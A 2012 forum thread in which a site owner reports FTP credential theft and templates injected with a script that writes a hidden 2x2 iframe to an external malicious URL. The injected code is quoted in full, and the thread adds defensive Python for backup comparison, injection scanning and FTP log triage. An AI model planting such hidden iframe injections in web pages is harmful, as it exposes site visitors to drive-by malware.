Malware
AlexeyNadezhin, 2012-07-13 12:51:38

Viruses on the site. How was FTP hacked?

On July 2, I unexpectedly received the following letter from Yandex in my mail:

Some of the pages on your website may pose a threat to your visitors' computer security. The number of potentially harmful pages is 1.

I registered on webmaster.yandex.com and launched a second check. The next day it reported that everything was fine, but I still decided to compare all the site files with last year's copy. It turned out that 12 files differ.
In the templates folder, two files had the date 06/29/12. In the header.tpl file, instead of the line
<body style="background: url(<?=PATH_WEB?>img/main_bg.gif) repeat-y center #244e9f;">

this mess came up:
<body style="background: url(<?=PATH_WEB?><!--c3284d--><script type="text/javascript">
document.write('<iframe src="httр://yоgоtraff.cu.cc/in.cgi?11" name="Google " scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->

img/main_bg.gif) repeat-y center #244e9f;">

The same thing was in the galleryEdit.tpl file and in ten more files in the script\jscalendar folder.
If you search on Google, this yogotraff can be found in the code of many Russian sites: www.google.ru/search?ie=UTF-8&hl=ru&q=yogotraff.
Obviously, this is some kind of malicious stuff. Of course, I restored the files, changed the passwords and wrote to the hosting provider asking how the infection had happened. I got a response and logs. At that time, someone from the American address 208.77.96.72 got into two of my FTP accounts (the second one is nested inside the first) and replaced a bunch of files there. As it turned out, my other sites had suffered too. The provider suggested scanning my computer for viruses. I checked with DrWeb and Kaspersky from boot disks, to clear my conscience. There are no viruses, just small things in Firefox's cache. So how was my FTP password stolen? It's complicated, you can't guess it.
What a terrible life.
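
Added example, not the author's own tooling: the two checks the post describes, done in code. It compares a live copy of the site against a known-good backup by SHA-256 to get the list of changed files, and scans files for the injection pattern quoted above (the `<!--c3284d--> ... <!--/c3284d-->` comment wrapper around a script that writes a 2x2 iframe), with a fallback that flags any iframe sized or styled to be invisible. The infected sample line is constructed from the header.tpl fragment in the post; the iframe URL in it is a placeholder, not the real one.

```python
"""Integrity check and injection scanner for a site tree (added example)."""
import hashlib
import os
import re
import sys

# Marker comments seen in the infected templates.  DOTALL matters because the
# injected block was spliced across several lines inside the <body> tag.
MARKER_RE = re.compile(r"<!--c3284d-->.*?<!--/c3284d-->", re.DOTALL)

# Generic fallback: any iframe whose geometry or style makes it invisible.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

# Constructed sample modelled on the header.tpl line quoted in the post.
# The iframe URL below is a placeholder, not the real one.
CLEAN_HEADER = (
    '<body style="background: url(<?=PATH_WEB?>img/main_bg.gif) '
    'repeat-y center #244e9f;">\n'
)
INFECTED_HEADER = (
    '<body style="background: url(<?=PATH_WEB?><!--c3284d-->'
    '<script type="text/javascript">\n'
    "document.write('<iframe src=\"http://malicious.example/in.cgi?11\" "
    'name="Google " scrolling="auto" frameborder="no" align="center" '
    "height=\"2\" width=\"2\"></iframe>');\n"
    '</script><!--/c3284d-->img/main_bg.gif) repeat-y center #244e9f;">\n'
)


def strip_injection(text):
    """Return (cleaned_text, number_of_injected_blocks_removed)."""
    return MARKER_RE.subn("", text)


def hidden_iframes(text):
    """Return the src of every iframe that is sized or styled to be invisible."""
    hits = []
    for tag in IFRAME_RE.findall(text):
        attrs = {}
        for name, dq, sq, bare in ATTR_RE.findall(tag):
            attrs[name.lower()] = dq or sq or bare

        def tiny(attr):
            value = attrs.get(attr, "").strip()
            return value.isdigit() and int(value) <= 2

        style = attrs.get("style", "").replace(" ", "").lower()
        if (tiny("width") or tiny("height")
                or "display:none" in style or "visibility:hidden" in style):
            hits.append(attrs.get("src", "<no src>"))
    return hits


def sha256_tree(root):
    """Map relative path -> SHA-256 of content for every file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_digests(live, backup):
    """Classify each path as added / removed / modified relative to the backup."""
    report = []
    for path in sorted(set(live) | set(backup)):
        if path not in backup:
            report.append((path, "added"))
        elif path not in live:
            report.append((path, "removed"))
        elif live[path] != backup[path]:
            report.append((path, "modified"))
    return report


def scan_tree(root):
    """Return [(relpath, marker_count, iframe_srcs)] for files carrying an injection."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            with open(full, "rb") as fh:
                text = fh.read().decode("utf-8", errors="replace")
            markers = len(MARKER_RE.findall(text))
            srcs = hidden_iframes(text)
            if markers or srcs:
                findings.append((os.path.relpath(full, root), markers, srcs))
    return findings


if __name__ == "__main__":
    cleaned, removed = strip_injection(INFECTED_HEADER)
    print("injected blocks removed:", removed)
    print("hidden iframes:", hidden_iframes(INFECTED_HEADER))
    print("restored line matches clean copy:", cleaned == CLEAN_HEADER)
    if len(sys.argv) == 3:  # usage: scanner.py LIVE_DIR BACKUP_DIR
        for path, why in diff_digests(sha256_tree(sys.argv[1]), sha256_tree(sys.argv[2])):
            print(why, path)
        for path, markers, srcs in scan_tree(sys.argv[1]):
            print("infected:", path, markers, srcs)
```

Run it with the live tree and the backup tree as arguments to get the "12 files differ" list without eyeballing dates; the marker regex cleans only this specific campaign, so the hash comparison is what catches files the attacker touched in a different way (new PHP shells in the jscalendar folder, for instance).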


7 answers
Ruma7a (@Ruma7a), 2012-07-13

"It's complicated, you can't guess it"
Uh-huh, only it's transmitted in plain text :) Maybe you should think about SSH / SFTP? I apologize in advance if everything is already secure in that regard; it's just that you mention "just" FTP there.

Vladimir Dubrovin (@z3apa3a), 2012-07-13

A fairly standard situation: a Trojan steals FTP passwords for websites. That is, there are or were viruses. Look for the Trojan on all computers from which the site was accessed via FTP; perhaps someone logged in from somewhere else and forgot about it. Change the FTP password. Then set the permissions on the files so that they cannot be overwritten via FTP, and each time you need to update the site, change the permissions back.

Konstantin Frolov (@nitro80), 2012-07-15

And your hoster doesn't happen to use Plesk, by any chance?

Niemand (@Niemand), 2012-07-13

I know for sure that this is how passwords are stolen from old versions of FileZilla, WS_FTP (I don't know about the new ones) and Total Commander.

freem4n (@freem4n), 2012-07-13

Are the websites on shared hosting? What server OS?

charliez (@charliez), 2012-07-13

It is enough to visit a site infected by the same scheme with any browser: through Adobe Flash / Sun Java vulnerabilities, the virus is activated on the computer and scans the saved passwords in the settings files of popular FTP clients.

admin4eg (@admin4eg), 2012-07-16

The standard situation, as they say above, is a computer from which the site was accessed at least once.
Trojans have long been able to collect passwords from FAR Manager, Total Commander and other popular programs.
Change the passwords, monitor login attempts, and restrict the incoming IPs on FTP.
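
Added example, not from any of the answers above: admin4eg's "monitor login attempts" and the log-based attribution the question describes, put into code. It reads FTP log lines in vsftpd's native format (constructed here, not the provider's real log), reports successful logins from addresses outside a trusted set, lists every file those sessions uploaded, deleted, renamed or chmod'ed (which is the restore list), and counts failed logins per address. 208.77.96.72 is the address named in the question; 93.184.216.34 is an assumed stand-in for the site owner's own connection.

```python
"""Triage a vsftpd-style FTP log after a site defacement (added example)."""
import re
import sys
from collections import Counter

# vsftpd native log line, e.g.
#   Fri Jun 29 23:41:05 2012 [pid 4877] [site_ftp] OK LOGIN: Client "208.77.96.72"
#   ... OK UPLOAD: Client "208.77.96.72", "/htdocs/templates/header.tpl", 1887 bytes, 45.12Kbyte/sec
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d{1,2} \d\d:\d\d:\d\d \d{4}) '
    r'\[pid \d+\] \[(?P<user>[^\]]+)\] '
    r'(?P<status>OK|FAIL) (?P<action>[A-Z]+): Client "(?P<ip>[^"]+)"'
    r'(?:, "(?P<path>[^"]+)")?'
)

# Actions that change what the web server will serve.
WRITE_ACTIONS = {"UPLOAD", "DELETE", "RENAME", "CHMOD", "RMDIR", "MKDIR"}

# Constructed sample log.  93.184.216.34 is an assumed "own" address.
TRUSTED_IPS = {"93.184.216.34"}
SAMPLE_LOG = """\
Fri Jun 29 08:02:11 2012 [pid 4101] [site_ftp] OK LOGIN: Client "93.184.216.34"
Fri Jun 29 08:02:40 2012 [pid 4101] [site_ftp] OK UPLOAD: Client "93.184.216.34", "/htdocs/news.php", 3120 bytes, 61.05Kbyte/sec
Fri Jun 29 23:41:03 2012 [pid 4877] [site_ftp] FAIL LOGIN: Client "208.77.96.72"
Fri Jun 29 23:41:05 2012 [pid 4877] [site_ftp] OK LOGIN: Client "208.77.96.72"
Fri Jun 29 23:41:09 2012 [pid 4877] [site_ftp] OK DOWNLOAD: Client "208.77.96.72", "/htdocs/templates/header.tpl", 1674 bytes, 40.11Kbyte/sec
Fri Jun 29 23:41:10 2012 [pid 4877] [site_ftp] OK UPLOAD: Client "208.77.96.72", "/htdocs/templates/header.tpl", 1887 bytes, 45.12Kbyte/sec
Fri Jun 29 23:41:12 2012 [pid 4877] [site_ftp] OK UPLOAD: Client "208.77.96.72", "/htdocs/templates/galleryEdit.tpl", 2213 bytes, 51.40Kbyte/sec
Fri Jun 29 23:41:15 2012 [pid 4877] [site_ftp] OK UPLOAD: Client "208.77.96.72", "/htdocs/script/jscalendar/calendar.js", 50217 bytes, 120.33Kbyte/sec
"""


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    match = LINE_RE.match(line)
    return match.groupdict() if match else None


def analyze(lines, trusted_ips):
    """Split the log into untrusted logins, the files they changed, and failed logins."""
    events = [event for event in map(parse_line, lines) if event]
    untrusted_logins = [
        event for event in events
        if event["action"] == "LOGIN" and event["status"] == "OK"
        and event["ip"] not in trusted_ips
    ]
    bad_ips = {event["ip"] for event in untrusted_logins}
    # Every path a suspicious address wrote to: the list to restore from backup.
    tampered = sorted({
        event["path"] for event in events
        if event["status"] == "OK" and event["action"] in WRITE_ACTIONS
        and event["ip"] in bad_ips and event["path"]
    })
    failed = Counter(
        event["ip"] for event in events
        if event["status"] == "FAIL" and event["action"] == "LOGIN"
    )
    return {
        "untrusted_logins": untrusted_logins,
        "tampered_files": tampered,
        "failed_logins": dict(failed),
    }


if __name__ == "__main__":
    # usage: ftp_triage.py [LOGFILE] [TRUSTED_IP ...]
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            log_lines = fh.read().splitlines()
    else:
        log_lines = SAMPLE_LOG.splitlines()
    trusted = set(sys.argv[2:]) or TRUSTED_IPS
    result = analyze(log_lines, trusted)
    for event in result["untrusted_logins"]:
        print("untrusted login:", event["ts"], event["user"], event["ip"])
    for path in result["tampered_files"]:
        print("restore:", path)
    for ip, count in result["failed_logins"].items():
        print("failed logins:", ip, count)
```

The single failed attempt followed two seconds later by a successful one is what a stolen password looks like in a log (one typo, then in), as opposed to a brute-force run of hundreds of failures. The addresses that end up in the untrusted set are also the input for admin4eg's last suggestion: restrict FTP to the trusted addresses at the firewall or in the FTP server's own allow list, so the next stolen password is useless from anywhere else.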
